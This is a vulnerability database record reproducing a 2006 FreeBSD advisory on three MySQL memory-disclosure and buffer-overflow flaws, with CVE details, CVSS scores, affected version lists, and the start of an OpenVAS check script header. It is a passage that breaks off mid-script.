MySQL -- Information Disclosure and Buffer Overflow Vulnerabilities
2006-05-02T00:00:00
ID: 4913886C-E875-11DA-B9F4-00123FFE8333
Type: freebsd
Reporter: FreeBSD
Modified: 2006-05-02T00:00:00
Description
Secunia reports:
MySQL has some vulnerabilities, which can be exploited by
malicious users to disclose potentially sensitive information
and compromise a vulnerable system.

1) An error within the code that generates an error response
to an invalid COM_TABLE_DUMP packet can be exploited by an
authenticated client to disclose certain memory content of the
server process.

2) A boundary error within the handling of specially crafted
invalid COM_TABLE_DUMP packets can be exploited by an authenticated
client to cause a buffer overflow and allow arbitrary code
execution.

3) An error within the handling of malformed login packets can be
exploited to disclose certain memory content of the server
process in the error messages.
{"id": "4913886C-E875-11DA-B9F4-00123FFE8333", "bulletinFamily": "unix", "title": "MySQL -- Information Disclosure and Buffer Overflow Vulnerabilities", "description": "\nSecunia reports:\n\nMySQL have some vulnerabilities, which can be exploited by\n\t malicious users to disclose potentially sensitive information\n\t and compromise a vulnerable system.\n1) An error within the code that generates an error response\n\t to an invalid COM_TABLE_DUMP packet can be exploited by an\n\t authenticated client to disclosure certain memory content of the\n\t server process.\n2) A boundary error within the handling of specially crafted\n\t invalid COM_TABLE_DUMP packets can be exploited by an authenticated\n\t client to cause a buffer overflow and allows arbitrary code\n\t execution.\n3) An error within the handling of malformed login packets can be\n\t exploited to disclosure certain memory content of the server\n\t process in the error messages.\n\n", "published": "2006-05-02T00:00:00", "modified": "2006-05-02T00:00:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "href": "https://vuxml.freebsd.org/freebsd/4913886c-e875-11da-b9f4-00123ffe8333.html", "reporter": "FreeBSD", "references": ["http://dev.mysql.com/doc/refman/4.1/en/news-4-0-27.html", "http://dev.mysql.com/doc/refman/4.1/en/news-4-1-19.html", "http://www.wisec.it/vulns.php?page=8", "http://www.vuxml.org/freebsd/a8d8713e-dc83-11da-a22b-000c6ec775d9.html", "http://www.wisec.it/vulns.php?page=7", "http://secunia.com/advisories/19929/", "http://dev.mysql.com/doc/refman/5.1/en/news-5-1-10.html"], "cvelist": ["CVE-2006-1517", "CVE-2006-1518", "CVE-2006-1516"], "type": "freebsd", "lastseen": "2019-05-29T18:34:44", "edition": 4, "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-1518", "CVE-2006-1517", "CVE-2006-1516"]}, {"type": "nessus", "idList": ["SUSE_MYSQL-1312.NASL", "MYSQL_5_0_21.NASL", "GENTOO_GLSA-200605-13.NASL", "DEBIAN_DSA-1071.NASL", 
"DEBIAN_DSA-1073.NASL", "DEBIAN_DSA-1079.NASL", "FREEBSD_PKG_4913886CE87511DAB9F400123FFE8333.NASL", "SUSE_SA_2006_036.NASL", "MANDRAKE_MDKSA-2006-084.NASL", "SLACKWARE_SSA_2006-129-02.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:56730", "OPENVAS:56728", "OPENVAS:136141256231056730", "OPENVAS:136141256231056861", "OPENVAS:56861", "OPENVAS:56850", "OPENVAS:56788", "OPENVAS:56833", "OPENVAS:56789", "OPENVAS:56714"]}, {"type": "slackware", "idList": ["SSA-2006-129-02", "SSA-2006-155-01"]}, {"type": "suse", "idList": ["SUSE-SA:2006:036"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1073-1:5FA93", "DEBIAN:DSA-1071-1:F1DE3", "DEBIAN:DSA-1079-1:FCFFC"]}, {"type": "ubuntu", "idList": ["USN-283-1"]}, {"type": "gentoo", "idList": ["GLSA-200605-13"]}, {"type": "osvdb", "idList": ["OSVDB:25227", "OSVDB:25226", "OSVDB:25228"]}, {"type": "centos", "idList": ["CESA-2006:0544"]}, {"type": "exploitdb", "idList": ["EDB-ID:1741", "EDB-ID:1742"]}, {"type": "freebsd", "idList": ["A8D8713E-DC83-11DA-A22B-000C6EC775D9"]}, {"type": "cert", "idList": ["VU:602457"]}, {"type": "redhat", "idList": ["RHSA-2006:0544"]}], "modified": "2019-05-29T18:34:44", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2019-05-29T18:34:44", "rev": 2}, "vulnersScore": 7.4}, "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "mysql-server", "packageVersion": "4.0.27"}], "scheme": null, "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:27:19", "description": "The check_connection function in sql_parse.cc in MySQL 4.0.x up to 4.0.26, 4.1.x up to 4.1.18, and 5.0.x up to 5.0.20 allows remote attackers to read portions of memory via a username without a trailing null byte, which causes a buffer over-read.", "edition": 6, "cvss3": {}, "published": "2006-05-05T12:46:00", "title": "CVE-2006-1516", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-1516"], "modified": "2019-12-17T20:16:00", "cpe": ["cpe:/a:mysql:mysql:5.0.4", "cpe:/a:oracle:mysql:4.0.24", "cpe:/a:oracle:mysql:4.0.5a", "cpe:/a:oracle:mysql:4.0.17", "cpe:/a:mysql:mysql:5.0.5", "cpe:/a:oracle:mysql:5.0.12", "cpe:/a:oracle:mysql:5.0.7", "cpe:/a:oracle:mysql:4.0.0", "cpe:/a:oracle:mysql:4.1.5", "cpe:/a:oracle:mysql:4.1.2", "cpe:/a:oracle:mysql:4.0.14", "cpe:/a:mysql:mysql:5.0.1", "cpe:/a:mysql:mysql:4.1.8", "cpe:/a:oracle:mysql:4.0.11", "cpe:/a:mysql:mysql:4.1.14", "cpe:/a:oracle:mysql:4.0.3", "cpe:/a:oracle:mysql:4.1.16", "cpe:/a:mysql:mysql:4.1.3", "cpe:/a:oracle:mysql:4.1.17", "cpe:/a:oracle:mysql:5.0.0", "cpe:/a:oracle:mysql:4.0.8", "cpe:/a:oracle:mysql:4.0.12", "cpe:/a:oracle:mysql:4.1.7", "cpe:/a:oracle:mysql:4.1.3", "cpe:/a:oracle:mysql:4.0.18", "cpe:/a:oracle:mysql:4.0.6", "cpe:/a:oracle:mysql:4.0.2", "cpe:/a:oracle:mysql:4.0.1", "cpe:/a:mysql:mysql:5.0.3", "cpe:/a:oracle:mysql:5.0.13", "cpe:/a:oracle:mysql:4.0.4", "cpe:/a:mysql:mysql:4.1.0", "cpe:/a:mysql:mysql:5.0.2", "cpe:/a:mysql:mysql:4.1.12", 
"cpe:/a:oracle:mysql:4.0.7", "cpe:/a:mysql:mysql:5.0.16", "cpe:/a:oracle:mysql:4.1.4", "cpe:/a:mysql:mysql:4.1.13", "cpe:/a:mysql:mysql:4.1.10", "cpe:/a:oracle:mysql:4.1.6", "cpe:/a:oracle:mysql:4.0.19", "cpe:/a:oracle:mysql:5.0.14", "cpe:/a:oracle:mysql:5.0.11", "cpe:/a:oracle:mysql:4.0.10", "cpe:/a:oracle:mysql:5.0.8", "cpe:/a:oracle:mysql:5.0.9", "cpe:/a:oracle:mysql:4.1.0", "cpe:/a:mysql:mysql:4.1.15", "cpe:/a:mysql:mysql:5.0.15", "cpe:/a:oracle:mysql:5.0.6", "cpe:/a:oracle:mysql:4.0.5", "cpe:/a:oracle:mysql:4.0.20", "cpe:/a:oracle:mysql:4.0.21", "cpe:/a:oracle:mysql:4.1.11", "cpe:/a:oracle:mysql:4.1.18", "cpe:/a:oracle:mysql:4.0.25", "cpe:/a:oracle:mysql:4.0.13", "cpe:/a:oracle:mysql:4.1.9", "cpe:/a:oracle:mysql:5.0.3", "cpe:/a:mysql:mysql:5.0.10", "cpe:/a:oracle:mysql:4.0.15", "cpe:/a:oracle:mysql:4.0.9", "cpe:/a:oracle:mysql:4.0.23", "cpe:/a:oracle:mysql:5.0.18", "cpe:/a:oracle:mysql:4.0.16", "cpe:/a:mysql:mysql:5.0.17", "cpe:/a:oracle:mysql:4.0.26"], "id": "CVE-2006-1516", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1516", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:oracle:mysql:4.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.18:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.24:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:4.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.5a:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.20:*:*:*:*:*:*:*", 
"cpe:2.3:a:mysql:mysql:4.1.15:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.8:gamma:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:4.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.2:alpha:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.3:beta:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.9:gamma:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.0:alpha:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:4.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:4.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.7:gamma:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.3:beta:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:4.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.26:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.17:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.10:*:*:*:*:*:*:*", 
"cpe:2.3:a:oracle:mysql:4.0.11:gamma:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.16:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.0:alpha:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.25:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:27:19", "description": "sql_parse.cc in MySQL 4.0.x up to 4.0.26, 4.1.x up to 4.1.18, and 5.0.x up to 5.0.20 allows remote attackers to obtain sensitive information via a COM_TABLE_DUMP request with an incorrect packet length, which includes portions of memory in an error message.", "edition": 6, "cvss3": {}, "published": "2006-05-05T12:46:00", "title": "CVE-2006-1517", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-1517"], "modified": "2019-12-17T20:16:00", "cpe": ["cpe:/a:mysql:mysql:5.0.4", "cpe:/a:oracle:mysql:4.0.24", "cpe:/a:oracle:mysql:4.0.5a", "cpe:/a:oracle:mysql:4.0.17", "cpe:/a:mysql:mysql:5.0.5", "cpe:/a:oracle:mysql:5.0.12", "cpe:/a:oracle:mysql:5.0.7", "cpe:/a:oracle:mysql:4.0.0", "cpe:/a:oracle:mysql:4.1.5", "cpe:/a:oracle:mysql:4.1.2", "cpe:/a:oracle:mysql:4.0.14", "cpe:/a:mysql:mysql:5.0.1", "cpe:/a:mysql:mysql:4.1.8", "cpe:/a:oracle:mysql:4.0.11", "cpe:/a:mysql:mysql:4.1.14", 
"cpe:/a:oracle:mysql:4.0.3", "cpe:/a:oracle:mysql:4.1.16", "cpe:/a:mysql:mysql:4.1.3", "cpe:/a:oracle:mysql:4.1.17", "cpe:/a:oracle:mysql:5.0.0", "cpe:/a:oracle:mysql:4.0.8", "cpe:/a:oracle:mysql:4.0.12", "cpe:/a:oracle:mysql:4.1.7", "cpe:/a:oracle:mysql:4.1.3", "cpe:/a:oracle:mysql:4.0.18", "cpe:/a:oracle:mysql:4.0.6", "cpe:/a:oracle:mysql:4.0.2", "cpe:/a:oracle:mysql:4.0.1", "cpe:/a:mysql:mysql:5.0.3", "cpe:/a:oracle:mysql:5.0.13", "cpe:/a:oracle:mysql:4.0.4", "cpe:/a:mysql:mysql:4.1.0", "cpe:/a:mysql:mysql:5.0.2", "cpe:/a:mysql:mysql:4.1.12", "cpe:/a:oracle:mysql:4.0.7", "cpe:/a:mysql:mysql:5.0.16", "cpe:/a:oracle:mysql:4.1.4", "cpe:/a:mysql:mysql:4.1.13", "cpe:/a:mysql:mysql:4.1.10", "cpe:/a:oracle:mysql:4.1.6", "cpe:/a:oracle:mysql:4.0.19", "cpe:/a:oracle:mysql:5.0.14", "cpe:/a:oracle:mysql:5.0.11", "cpe:/a:oracle:mysql:4.0.10", "cpe:/a:oracle:mysql:5.0.8", "cpe:/a:oracle:mysql:5.0.9", "cpe:/a:oracle:mysql:4.1.0", "cpe:/a:mysql:mysql:4.1.15", "cpe:/a:mysql:mysql:5.0.15", "cpe:/a:oracle:mysql:5.0.6", "cpe:/a:oracle:mysql:4.0.5", "cpe:/a:oracle:mysql:4.0.20", "cpe:/a:oracle:mysql:4.0.21", "cpe:/a:oracle:mysql:4.1.11", "cpe:/a:oracle:mysql:4.1.18", "cpe:/a:oracle:mysql:4.0.25", "cpe:/a:oracle:mysql:4.0.13", "cpe:/a:oracle:mysql:4.1.9", "cpe:/a:oracle:mysql:5.0.3", "cpe:/a:mysql:mysql:5.0.10", "cpe:/a:oracle:mysql:4.0.15", "cpe:/a:oracle:mysql:4.0.9", "cpe:/a:oracle:mysql:4.0.23", "cpe:/a:oracle:mysql:5.0.18", "cpe:/a:oracle:mysql:4.0.16", "cpe:/a:mysql:mysql:5.0.17", "cpe:/a:oracle:mysql:4.0.26"], "id": "CVE-2006-1517", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1517", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:oracle:mysql:4.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.18:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.7:*:*:*:*:*:*:*", 
"cpe:2.3:a:oracle:mysql:4.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.24:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:4.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.5a:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:4.1.15:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.8:gamma:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:4.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.2:alpha:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.3:beta:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.9:gamma:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.0:alpha:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:4.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:4.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.7:gamma:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.3:beta:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:4.1.12:*:*:*:*:*:*:*", 
"cpe:2.3:a:oracle:mysql:4.0.26:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.17:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.11:gamma:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.16:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.0:alpha:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.25:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:27:19", "description": "Buffer overflow in the open_table function in sql_base.cc in MySQL 5.0.x up to 5.0.20 might allow remote attackers to execute arbitrary code via crafted COM_TABLE_DUMP packets with invalid length values.", "edition": 5, "cvss3": {}, "published": "2006-05-05T12:46:00", "title": "CVE-2006-1518", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": 
["CVE-2006-1518"], "modified": "2019-12-17T20:16:00", "cpe": ["cpe:/a:mysql:mysql:5.0.4", "cpe:/a:mysql:mysql:5.0.5", "cpe:/a:oracle:mysql:5.0.12", "cpe:/a:oracle:mysql:5.0.7", "cpe:/a:oracle:mysql:5.0.19", "cpe:/a:mysql:mysql:5.0.1", "cpe:/a:oracle:mysql:5.0.0", "cpe:/a:mysql:mysql:5.0.20", "cpe:/a:mysql:mysql:5.0.3", "cpe:/a:oracle:mysql:5.0.13", "cpe:/a:mysql:mysql:5.0.2", "cpe:/a:mysql:mysql:5.0.16", "cpe:/a:oracle:mysql:5.0.14", "cpe:/a:oracle:mysql:5.0.11", "cpe:/a:oracle:mysql:5.0.8", "cpe:/a:oracle:mysql:5.0.9", "cpe:/a:mysql:mysql:5.0.15", "cpe:/a:oracle:mysql:5.0.6", "cpe:/a:oracle:mysql:5.0.3", "cpe:/a:mysql:mysql:5.0.10", "cpe:/a:oracle:mysql:5.0.18", "cpe:/a:mysql:mysql:5.0.17"], "id": "CVE-2006-1518", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1518", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mysql:mysql:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.0:alpha:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.3:beta:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.20:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-24T12:51:02", "bulletinFamily": "scanner", "cvelist": 
["CVE-2006-1517", "CVE-2006-1518", "CVE-2006-1516"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2006-129-02.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:56730", "href": "http://plugins.openvas.org/nasl.php?oid=56730", "type": "openvas", "title": "Slackware Advisory SSA:2006-129-02 mysql", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2006_129_02.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New mysql packages are available for Slackware 10.2 and -current to\nfix security issues. The MySQL package shipped with Slackware 10.2\nmay possibly leak sensitive information found in uninitialized\nmemory to authenticated users. 
